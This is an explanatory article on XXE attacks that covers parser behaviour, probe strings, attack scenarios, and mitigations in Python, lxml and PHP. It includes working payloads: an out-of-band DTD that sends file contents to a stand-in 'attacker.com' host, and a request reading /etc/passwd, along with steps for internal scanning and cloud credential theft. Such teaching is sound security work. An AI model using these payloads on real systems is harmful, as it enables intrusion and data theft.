When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.
How the XML parser handles XXEs
An XXE is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification, relative URIs are relative to the location of the resource within which the entity declaration occurs.
This is defined to be the external entity containing the < which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).
Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.
In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.
Figure 1 — XXE attack flow: from malicious DTD to data exfiltration
An actual example of XXE
Based on what is already explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:
See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file contents will be loaded and returned.
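For reference, a document of the kind described here might look like the string in the sketch below. It is a reconstruction from the description (the `xxe` entity, the `PutMeHere` tag, `/etc/passwd`), not necessarily the exact original listing. The sketch feeds it to Python's standard `xml.etree.ElementTree`, which is documented not to expand external entities and to raise a `ParseError` instead, so it shows the safe outcome rather than the badly configured one. The helper name `parse_or_refuse` is hypothetical.

```python
import xml.etree.ElementTree as ET

# Reconstructed example document (an assumption based on the description).
XXE_DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>"""


def parse_or_refuse(document: str) -> str:
    """Report whether the parser accepted the document or refused it."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        # ElementTree does not resolve external entities; the reference
        # to &xxe; is reported as an error instead of being expanded.
        return "refused: {}".format(exc)
    return "parsed: {!r}".format(root.text)


if __name__ == "__main__":
    print(parse_or_refuse(XXE_DOCUMENT))
```

A parser that does resolve external entities would instead return the file contents as the text of the `PutMeHere` element.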
Note: The XML document is not valid if the &xxe; reference does not start with the & character and terminate with the ; character. The attack is limited to files containing text that the XML parser will allow at the place where the external entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
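The restriction in the note can be approximated with a rough heuristic, sketched below. It assumes UTF-8 input and treats any less-than sign, ampersand, or control character (other than tab, line feed, and carriage return) as disqualifying. A real parser is slightly more permissive, since a file that happens to contain well-formed markup would still be accepted. The function name `likely_expandable` is hypothetical.

```python
def likely_expandable(data: bytes) -> bool:
    """Heuristic: could this file content survive as entity replacement text?"""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False  # not decodable text, the parser would reject it
    for ch in text:
        if ch in "<&":
            return False  # would be read as markup or an entity reference
        if ord(ch) < 0x20 and ch not in "\t\n\r":
            return False  # control characters are not legal XML characters
    return True


if __name__ == "__main__":
    print(likely_expandable(b"root:x:0:0:root:/root:/bin/bash\n"))
    print(likely_expandable(b"if (a < b && c) {}"))
```

This is why plain configuration files such as /etc/passwd are typical targets, while binaries and most source code are not.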
Identifying XXE attack strings
The following table contains attack strings that break XML well-formedness and may cause the XML parser to return verbose errors, which helps identify the XML structures in use.
| # | Payload | Purpose |
|---|---------|---------|
| 1 | `'` | Single quote: break attribute values |
| 2 | `''` | Double single quote |
| 3 | `"` | Double quote: break attribute values |
| 4 | `""` | Double double quote |
| 5 | `<` | Open tag: trigger parser error |
| 6 | `>` | Close tag |
| 7 | `]]>` | CDATA end: premature closure |
| 8 | `]]>>` | Malformed CDATA end |
| 9 | `<!--/-->` | Complete comment (open and close delimiters) |
| 10 | `/-->` | Partial comment close |
| 11 | `-->` | Comment close without open |
| 12 | `<!--` | Comment open without close |
| 13 | `<!` | Incomplete declaration |
| 14 | `<![CDATA[ / ]]>` | CDATA section delimiters: content is not parsed as markup |
CDATA sections: <![CDATA[ / ]]>. CDATA sections are used to escape blocks of text containing characters that would otherwise be recognized as markup. The XML parser treats everything enclosed in a CDATA section as character data rather than markup.
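To see which of these strings actually produce a parser error, a small harness like the following can be used against a local parser. It is a minimal sketch: the `<user>` template is a hypothetical message format, and the error text depends on the parser in use (here Python's standard `xml.etree.ElementTree`).

```python
import xml.etree.ElementTree as ET

# Hypothetical message format; the payload lands in the username element.
TEMPLATE = "<user><username>{}</username><password>secret</password></user>"

PROBES = ["'", "''", '"', '""', "<", ">", "]]>", "-->", "<!--", "<!"]


def probe(payload: str):
    """Return the parser's error message, or None if the document parsed."""
    document = TEMPLATE.format(payload)
    try:
        ET.fromstring(document)
    except ET.ParseError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    for payload in PROBES:
        print(repr(payload), "->", probe(payload))
```

Quotes placed in element content parse cleanly, which is itself informative: it suggests the value is not being inserted into an attribute.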
Exploiting XXE vulnerabilities
Let's suppose there is a web application using XML-style communication to perform user login. This is done by creating and adding a new <user> node on an XML database file. We will try to inject XML that breaks the schema. Some or all of the following attempts will generate an XML error, helping us understand the XML schema.
Injecting <!-- after the username causes the parser to interpret everything after it as a comment, potentially consuming the closing tag and credentials field — generating an informative error message that reveals schema structure.
When the XML document is parsed, the CDATA delimiters are eliminated, reconstructing a <script> tag. If the tag contents are reflected in an HTML page, XSS is achieved.
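The CDATA behaviour described above can be reproduced locally. The sketch below uses a hypothetical `<comment>` element and a harmless `alert` payload, and assumes Python's standard `xml.etree.ElementTree` as the parser. It also shows that HTML-escaping the parsed text before reflecting it neutralises the reconstructed tag.

```python
import html
import xml.etree.ElementTree as ET

# Each angle bracket is hidden in its own CDATA section, so the raw
# document never contains the literal string "<script>".
DOCUMENT = (
    "<comment>"
    "<![CDATA[<]]>script<![CDATA[>]]>"
    "alert('xss')"
    "<![CDATA[<]]>/script<![CDATA[>]]>"
    "</comment>"
)


def parsed_text(document: str) -> str:
    """Return the text content of the root element after parsing."""
    return ET.fromstring(document).text or ""


if __name__ == "__main__":
    text = parsed_text(DOCUMENT)
    print(text)               # CDATA delimiters are gone after parsing
    print(html.escape(text))  # safe to place into an HTML page
```

A filter that inspects only the raw XML for `<script>` would miss this input, which is why output encoding at the point of reflection is the more reliable control.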
A real attack scenario
XXE attacks can result in OS file read access, similar to a path traversal attack. Consider a sophisticated e-banking application that uses the browser as a thin client, consuming a web service after successful login. The transaction XML message carries the username and password back and forth alongside the transaction data.
The &xxefca0a; entity reference in the <principal> tag causes the parser to read /etc/passwd and embed its contents into the XML. The server response — whether a success or error message — will contain the file contents concatenated with the username.
Figure 2 — XXE escalation: from file read to full internal network pivot
The next step after initial file exfiltration would be to map the outbound local firewall rules to see what traffic is allowed to go out. Download the /etc/hosts file of the compromised web server, then start forwarding traffic to identified internal machines. As soon as you get a response back, you know that the specific machine is actively responding. Then rotate through all ports to identify which services are accessible. This maps the egress filtering done by the application server's local firewall.
After mapping the firewall rules, the next step would be to fingerprint surrounding web servers using DirBuster directory lists, or further escalate using HTTPS to fingerprint based on SSL/TLS error responses, and then deliver payloads or perform path traversal / SQL injection attacks through the XML parser.
What can you do with a successful XXE attack
Use the application as a proxy, retrieving sensitive content from any web servers the application can reach, including those on private non-routable address space.
Exploit vulnerabilities on back-end web applications, provided they can be exploited via URIs (directory brute-forcing, SQL injection, path traversal, etc.).
Test for open ports on back-end systems by cycling through IP addresses and port numbers. Timing differences can be used to infer the state of requested ports. Service banners may appear in application responses.
Map firewall rules on other company extranets.
DoS internal company web server machines (e.g. requesting /dev/random or recursive entity expansion — the "Billion Laughs" attack).
Hide port scans by mixing them with the vulnerable web server's legitimate traffic.
Access cloud metadata endpoints to steal IAM credentials (AWS, GCP, Azure).
Connect to internal services like syslog daemons, proxy admin panels, or unprotected file shares via UNC paths.
Launch blind SQL injection attacks through the parser against surrounding database servers.
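The recursive entity expansion mentioned in the list is easiest to appreciate as arithmetic. The sketch below assumes the commonly cited shape of the "Billion Laughs" document: a three-character base entity and nine further entities, each referencing the previous one ten times. Those numbers are an assumption for illustration, and the function name `expanded_length` is hypothetical.

```python
def expanded_length(levels: int, fanout: int, base_length: int) -> int:
    """Length of the fully expanded top-level entity.

    levels      -- number of nested entities above the base entity
    fanout      -- how many times each entity references the one below it
    base_length -- length of the base entity's text
    """
    return base_length * fanout ** levels


if __name__ == "__main__":
    size = expanded_length(levels=9, fanout=10, base_length=3)
    print("{:,} characters".format(size))
```

A document well under a kilobyte therefore expands to roughly three billion characters, which is why parsers need an expansion limit or, better, no DTD processing at all.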
Modern attack vectors
Blind XXE via out-of-band (OOB) exfiltration
When the application does not return the parsed entity content in its response (no direct output), blind XXE via OOB channels can still exfiltrate data. The technique uses parameter entities to load an external DTD from an attacker-controlled server, which in turn constructs a URL containing the target file's contents and forces the parser to request it.
# Malicious payload sent to the application:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>

# Contents of evil.dtd hosted on attacker.com
# (the nested % is written as &#x25; because a bare % is not allowed inside an entity value):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
The parser loads the external DTD, reads the target file into the %file; parameter entity, constructs a URL containing the file data, and makes an HTTP request to the attacker's server — exfiltrating the data in the URL query string. This works even when no XML output is reflected to the attacker.
Figure 3 — Blind XXE via out-of-band (OOB) data exfiltration
XXE via file upload
Many common file formats are XML-based internally. Uploading a malicious file in one of these formats can trigger XXE processing even when the application doesn't appear to accept XML input:
SVG images — SVG is XML. A malicious SVG with an XXE payload can trigger when the server processes the image (thumbnail generation, rendering, metadata extraction).
DOCX / XLSX / PPTX — Microsoft Office Open XML formats are ZIP archives containing XML files. Replacing [Content_Types].xml or other internal XML files with XXE payloads can trigger the vulnerability when the server parses the document.
SOAP endpoints — SOAP is inherently XML-based. DTD declarations injected into SOAP envelopes are frequently processed by the underlying XML parser.
Some application frameworks accept both JSON and XML based on the Content-Type header. If an API endpoint normally expects JSON, switching the Content-Type to application/xml or text/xml may cause the server to route the body through an XML parser — even if the developers never intended to accept XML input. This is particularly common with Java-based REST frameworks (JAX-RS, Spring MVC).
# Original JSON request:
POST /api/login HTTP/1.1
Content-Type: application/json

{"username": "admin", "password": "test"}

# Switched to XML with XXE:
POST /api/login HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
  <username>&xxe;</username>
  <password>test</password>
</root>
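On the defensive side, an endpoint that is meant to accept only JSON can refuse other media types before the body reaches any parser. The following is a minimal, framework-independent sketch. The allowlist and the function names are assumptions for illustration, and a real application would wire this check into its framework's request handling.

```python
# Media types this (hypothetical) endpoint is willing to parse.
ALLOWED_MEDIA_TYPES = {"application/json"}


def media_type(content_type_header: str) -> str:
    """Extract the bare media type, dropping parameters such as charset."""
    return content_type_header.split(";", 1)[0].strip().lower()


def is_allowed(content_type_header: str) -> bool:
    """True only if the request declares an allowlisted media type."""
    return media_type(content_type_header) in ALLOWED_MEDIA_TYPES


if __name__ == "__main__":
    for header in ("application/json; charset=utf-8",
                   "application/xml",
                   "text/xml"):
        print(header, "->", "accept" if is_allowed(header) else "reject (415)")
```

An allowlist is used rather than a blocklist of XML types so that variants such as `application/soap+xml` are rejected without having to be enumerated.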
Mitigation of XXE vulnerabilities
The primary defense is to disable DTD processing and external entity resolution in your XML parser. The exact configuration varies by language and library:
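# Python: use defusedxml, a drop-in replacement that blocks XXE by default
import defusedxml.ElementTree as ET
tree = ET.parse('input.xml')

# Or with lxml, disable network access and entity resolution
from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,  # do not expand entity references
    no_network=True,         # never fetch DTDs or entities over the network
    dtd_validation=False,    # do not validate against a DTD
    load_dtd=False,          # do not load external DTD subsets
)
tree = etree.parse('input.xml', parser)  # pass the hardened parser explicitly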
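Where neither library is available, the same idea (refuse any document that carries a DOCTYPE) can be approximated with the Python standard library alone. The sketch below is an assumption about how one might do this, not the method used by defusedxml or lxml. It runs a first pass with `xml.parsers.expat` whose only job is to reject DOCTYPE declarations, and only then builds the tree. The names `DoctypeForbidden` and `parse_untrusted` are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as a DOCTYPE declaration starts.
    raise DoctypeForbidden("DOCTYPE declarations are not accepted")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE declaration."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _forbid_doctype
    checker.Parse(data, True)  # first pass: reject DTDs (and malformed XML)
    return ET.fromstring(data)  # second pass: build the element tree


if __name__ == "__main__":
    print(parse_untrusted(b"<a>hi</a>").text)
    try:
        parse_untrusted(b'<!DOCTYPE a [<!ENTITY x "y">]><a>&x;</a>')
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

Parsing twice costs some time, but it keeps the check independent of how the tree-building parser is configured.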
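// PHP < 8.0 only: disable external entity loading before any XML parsing
// (deprecated in PHP 8.0+, where libxml2 >= 2.9.0 already disables it by default)
libxml_disable_entity_loader(true);
// For SimpleXML: do NOT pass LIBXML_NOENT, which turns entity substitution ON.
// LIBXML_NONET forbids network access while loading the document.
$xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NONET);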
Important: libxml_disable_entity_loader() is deprecated as of PHP 8.0 because libxml2 >= 2.9.0 disables external entity loading by default. However, always verify your specific PHP and libxml2 versions, since older deployments may still be vulnerable, and never pass LIBXML_NOENT when parsing untrusted input, because that flag enables entity substitution.
General hardening principles
Disable DTD processing entirely — this is the most effective defense. If your application doesn't need DTD validation (and almost none do), disable the DOCTYPE declaration completely.
Use allowlists for external entity URIs — if external entities are genuinely needed, restrict them to known-good URIs only.
Validate Content-Type headers — reject XML content types on endpoints that should only accept JSON. This blocks content-type switching attacks.
Scan uploaded files — inspect DOCX, XLSX, SVG, and other XML-based file formats for DTD declarations before processing them.
Apply network-level controls — even if XXE is exploited, egress filtering, IMDSv2 enforcement, and network segmentation limit the blast radius.
Use SAST tools — static analysis can identify insecure XML parser configurations. Tools like Semgrep have built-in rules for XXE detection across multiple languages.
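The "scan uploaded files" principle can be sketched for ZIP-based formats such as DOCX or XLSX as follows. This is a minimal illustration under stated assumptions: it looks only for the byte sequences `<!DOCTYPE` and `<!ENTITY` in members whose names end in `.xml` or `.rels`, so a payload in another encoding (UTF-16, for example) would slip past it. The size cap and the function names are hypothetical.

```python
import io
import zipfile
from typing import List

SUSPICIOUS_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")
MAX_MEMBER_BYTES = 10 * 1024 * 1024  # assumed cap to avoid reading huge members


def xml_members_with_dtd(archive_bytes: bytes) -> List[str]:
    """Return names of XML members that contain DTD-related markers."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                flagged.append(info.filename)  # too large to inspect: flag it
                continue
            content = archive.read(info)
            if any(marker in content for marker in SUSPICIOUS_MARKERS):
                flagged.append(info.filename)
    return flagged


def build_demo_archive() -> bytes:
    """Build a tiny in-memory archive with one clean and one suspicious member."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr(
            "word/document.xml",
            '<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/hostname">]><d>&x;</d>',
        )
    return buffer.getvalue()


if __name__ == "__main__":
    print(xml_members_with_dtd(build_demo_archive()))
```

A scan like this is a pre-filter, not a replacement for configuring the parser that eventually processes the document.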
Summary
When an application is vulnerable to XXE, the attacker may be capable of gaining access to the web server OS file system, causing DoS attacks (via /dev/random or recursive entity expansion), performing SSRF against internal services, exfiltrating data via out-of-band channels, or even achieving XSS through XML-to-HTML reflection. Modern XXE often comes through non-obvious vectors: SVG uploads, Office documents, SOAP endpoints, and content-type switching on REST APIs.